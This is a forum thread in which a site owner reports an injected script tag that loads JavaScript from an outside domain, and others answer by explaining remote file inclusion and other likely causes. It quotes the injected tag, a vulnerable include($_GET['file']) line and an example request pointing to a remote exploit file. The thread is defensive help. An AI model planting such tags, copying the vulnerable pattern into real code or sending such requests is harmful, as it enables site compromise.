Jump to content

Recommended Posts

Hi,

Recently I've found some of my websites has infected by something.. I really don't know how to call it.

 

Some where in the source (usually, index.php or home.php) has this suspicious line. I don't know what's that, but it seems harmful. The script are mostly like below:

 

<!-- ad --><script language=javascript src="http://counter.ironsteelmoney.com/show.js"></script><!-- /ad -->

 

My questions are, what should i call this? Am I being cracked/hacked? How could it be happened? I've deleted it, but I'm not sure whether this won't back. Could please anyone help me?

 

Thank you,

 

ayok

Link to comment
https://forums.phpfreaks.com/topic/155864-sites-being-hacked/
Share on other sites

Aside from a password being found out. It could be a script that dynamically includes a file an example:

 

include($_GET['file']);

 

If url_fopen_wrappers are turned on then that allows for someone to inject their own code from a remote website by passing something like this:

index.php?file=http://www.mysite.com/exploit.txt

 

And viola, their code gets executed. Which would allow them to create a file to write to other files etc. The gist of it is, you need to look at your code and see if there may be a vulnerability to allow someone to access. To find the offending file you can look at the apache access logs as it will show you each GET Request that was sent and if you see something like the above url being sent via get, someone is probing and or found the vulnerability and it usually can lead to you finding the offending file.

 

The only reason I know this is one of my hosted users had an old version of OS Commerce that and an exploit in it, and this allowed for someone to create a script that used my mail server to send out spam. Luckily they only screwed with OS Commerce so it was as simple as backing up the products and installing the newer version to fix it and deleting the file.

Link to comment
https://forums.phpfreaks.com/topic/155864-sites-being-hacked/#findComment-820525
Share on other sites

Are you using cPanel? One of my old web hosts was using that, and it got hacked, and who ever got in changed EVERYONE'S  index and/or home files on the servers to something that was like hatred towards the U.S. It even got into the hosts back up files. They then took the back up files offline in case that were to happen again.

 

It is also possible:

- hacked username/password

- Anonymous FTP is on

- You have a coding error

 

and according to Firefox:

Reported Attack Site!

Link to comment
https://forums.phpfreaks.com/topic/155864-sites-being-hacked/#findComment-820612
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.